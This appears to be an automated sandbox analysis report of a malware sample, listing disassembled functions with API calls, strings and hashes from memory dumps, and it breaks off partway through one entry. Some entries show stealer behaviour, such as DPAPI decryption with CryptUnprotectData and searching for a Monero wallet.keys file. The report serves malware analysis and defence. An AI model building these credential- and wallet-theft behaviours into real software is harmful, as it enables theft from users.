                  Function 009F564E Relevance: 6.6, Strings: 4, Instructions: 1612COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 0vs$8k[z$_vg$|=~o
                  • API String ID: 0-730756381
                  • Opcode ID: b79b03ebf3ead7a0d43e6f5bc36651df9123c93d8e8c82a7df2b7da3381d0666
                  • Instruction ID: e15c2e3287d22acbdddeac188f0f879985c71fa69a6aeea39d54efa6100a3517
                  • Opcode Fuzzy Hash: b79b03ebf3ead7a0d43e6f5bc36651df9123c93d8e8c82a7df2b7da3381d0666
                  • Instruction Fuzzy Hash: 16B2F5F360C204AFE7086E29EC8567AF7E9EF94320F1A493DE6C5C3744EA7558018697
                  Function 009DDE4B Relevance: 6.6, Strings: 4, Instructions: 1560COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: yo{$91Pk$PS]$T7?
                  • API String ID: 0-2497957618
                  • Opcode ID: d874fbd446a459e4fbff65c3da4c1eee106217402b6e4e15fee7d98dbbf88b3e
                  • Instruction ID: 0132c2166d14e1fe65bc3969ddac5eb0c3aec968cbe85705f779860555c6dc3a
                  • Opcode Fuzzy Hash: d874fbd446a459e4fbff65c3da4c1eee106217402b6e4e15fee7d98dbbf88b3e
                  • Instruction Fuzzy Hash: 28B2F3F360C204AFE3046E2DEC8567AFBE9EF94720F1A493DE6C4C7744E63598418696
                  Function 00638EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptBinaryToStringA.CRYPT32(00000000,00625184,40000001,00000000,00000000,?,00625184), ref: 00638EC0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptString
                  • String ID:
                  • API String ID: 80407269-0
                  • Opcode ID: 16b891bfc747e251ee3642b755c61db89f07524db1e1f0a43f75c7830420cab3
                  • Instruction ID: 721b068fba633070527f393980a342c85ca3fc4f741491bd537fa045b73f156b
                  • Opcode Fuzzy Hash: 16b891bfc747e251ee3642b755c61db89f07524db1e1f0a43f75c7830420cab3
                  • Instruction Fuzzy Hash: B1110674204308AFDB04CF64E884FEA37AABF89340F10A558F9198B250DB75E941DBA0
                  Function 00637A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0131F088,00000000,?,00640E10,00000000,?,00000000,00000000), ref: 00637A63
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00637A6A
                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0131F088,00000000,?,00640E10,00000000,?,00000000,00000000,?), ref: 00637A7D
                  • wsprintfA.USER32 ref: 00637AB7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                  • String ID:
                  • API String ID: 3317088062-0
                  • Opcode ID: 313534d0e78188fd4aebc9e1db89b33cff0de2a6781cfceaa5cc07a5fa72e7ed
                  • Instruction ID: 861333ceb8d8860f25ab404653ecb2c84b8e5338c5fd869e20c5d06c778357cf
                  • Opcode Fuzzy Hash: 313534d0e78188fd4aebc9e1db89b33cff0de2a6781cfceaa5cc07a5fa72e7ed
                  • Instruction Fuzzy Hash: 6E1161B1945228EBEB24CF54DC49FA9BB79FB44721F1043AAE91AA32C0D7745E40CF91
                  Function 009DF92F Relevance: 5.4, Strings: 3, Instructions: 1632COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: /Z-$P?}$,|{
                  • API String ID: 0-573491483
                  • Opcode ID: be0cfcab6ecc91311f1896eceeb3761a67e477afb6f958523322574be62027ac
                  • Instruction ID: 67c3f702a6db783a0afd66d1f865fa7bdd7ad727b0fface414bfbfca2d53a90e
                  • Opcode Fuzzy Hash: be0cfcab6ecc91311f1896eceeb3761a67e477afb6f958523322574be62027ac
                  • Instruction Fuzzy Hash: 7FB2F9F3A0C2049FE3046E2DEC8567AB7D9EF94720F16853DEAC4C7744EA3598058796
                  Function 009F208E Relevance: 5.3, Strings: 3, Instructions: 1596COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: ;Aks$=@_4$lX1
                  • API String ID: 0-4188162932
                  • Opcode ID: da88e19335446a9adc5f9473c99729054d179707ed2af3592ee58004d6baf57e
                  • Instruction ID: 5891a01422de39d14642ed0348212bdcf8293480565eec09d45eeb1e503481e0
                  • Opcode Fuzzy Hash: da88e19335446a9adc5f9473c99729054d179707ed2af3592ee58004d6baf57e
                  • Instruction Fuzzy Hash: A3B2E2F360C6049FE304AE29EC8577AF7E9EF94720F1A893DE6C4C7744EA3558018696
                  Function 009E48AC Relevance: 5.3, Strings: 3, Instructions: 1568COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: *f|r${[{$C<
                  • API String ID: 0-841349331
                  • Opcode ID: 257ae365996c9fbc382ff9f8100ad767395dca811f4177fa153274fc577d4b30
                  • Instruction ID: 7cf0e223ba2f03d01d2c593688618285316fefc242d02e8b8f2747134a00fa7a
                  • Opcode Fuzzy Hash: 257ae365996c9fbc382ff9f8100ad767395dca811f4177fa153274fc577d4b30
                  • Instruction Fuzzy Hash: 48B2F4F360C204AFE704AE2DEC8567ABBE9EF94720F1A493DE6C4C3744E63558058796
                  Function 00633720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                  Download Yara Rule
                  APIs
                  • CoCreateInstance.COMBASE(0063E118,00000000,00000001,0063E108,00000000), ref: 00633758
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 006337B0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharCreateInstanceMultiWide
                  • String ID:
                  • API String ID: 123533781-0
                  • Opcode ID: 1d815c2e0695480bde9c599c66bf2cfe4e094d7faa1203d061d7eb71187edd7b
                  • Instruction ID: e765a399961cf2b6fc6dcde52c76523d4ff64a1cb60de3df965273bb62546ce1
                  • Opcode Fuzzy Hash: 1d815c2e0695480bde9c599c66bf2cfe4e094d7faa1203d061d7eb71187edd7b
                  • Instruction Fuzzy Hash: 0C41C770A40A289FDB24DF58CC95F9BB7B5BB48702F4051D8E609A72D0D7B16E85CF90
                  Function 00629B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00629B84
                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00629BA3
                  • LocalFree.KERNEL32(?), ref: 00629BD3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$AllocCryptDataFreeUnprotect
                  • String ID:
                  • API String ID: 2068576380-0
                  • Opcode ID: 60d3ff593a453b778b518d0414d91d6ef6c9bed707d2a29b8dee51220bdb9ded
                  • Instruction ID: 79d25fc2ac710a487b43cee22011f3d079fcb1ccbd6d8d594c11bb2fd127f04c
                  • Opcode Fuzzy Hash: 60d3ff593a453b778b518d0414d91d6ef6c9bed707d2a29b8dee51220bdb9ded
                  • Instruction Fuzzy Hash: AF11CCB4A00209DFDB04DF94D985AAE77B5FF88301F104568E915A7390D774AE11CFA1
                  Function 009E9963 Relevance: 4.2, Strings: 2, Instructions: 1676COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 3>Z$}<=
                  • API String ID: 0-687808223
                  • Opcode ID: 7ea6bd24833557cd330c43fd87001da06fc30eefe84a689ece711d24de998d47
                  • Instruction ID: 5c2378a3e5d2017319960ccc5e1e141f1a1c5207f7c84df54c5e7d3c4928d1f7
                  • Opcode Fuzzy Hash: 7ea6bd24833557cd330c43fd87001da06fc30eefe84a689ece711d24de998d47
                  • Instruction Fuzzy Hash: 76B229F3A0C2049FE3046E2DEC8567ABBE9EF94720F16493DEAC4C3744EA7558058696
                  Function 009E73F1 Relevance: 2.7, Strings: 2, Instructions: 245COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: ai&}$wK^M
                  • API String ID: 0-3948353111
                  • Opcode ID: 63922ca1a160b51dbae456ce2db0c6a5b6fc74e0bbbfd7055e0eb5fffb87692b
                  • Instruction ID: 1aa1c1f7bfa1971993727b8982644769d7c21016bb7c1fc37ec270cbf54452b5
                  • Opcode Fuzzy Hash: 63922ca1a160b51dbae456ce2db0c6a5b6fc74e0bbbfd7055e0eb5fffb87692b
                  • Instruction Fuzzy Hash: AB716AB3A0D2149FD714AE2DEC8163AF7E9EF94720F1A492DEAC4C7340EA35580186D6
                  Function 0062F68A Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 0063A920: lstrcpy.KERNEL32(00000000,?), ref: 0063A972
                    • Part of subcall function 0063A920: lstrcat.KERNEL32(00000000), ref: 0063A982
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006415B8,00640D96), ref: 0062F71E
                  • StrCmpCA.SHLWAPI(?,006415BC), ref: 0062F76F
                  • StrCmpCA.SHLWAPI(?,006415C0), ref: 0062F785
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0062FAB1
                  • FindClose.KERNEL32(000000FF), ref: 0062FAC3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
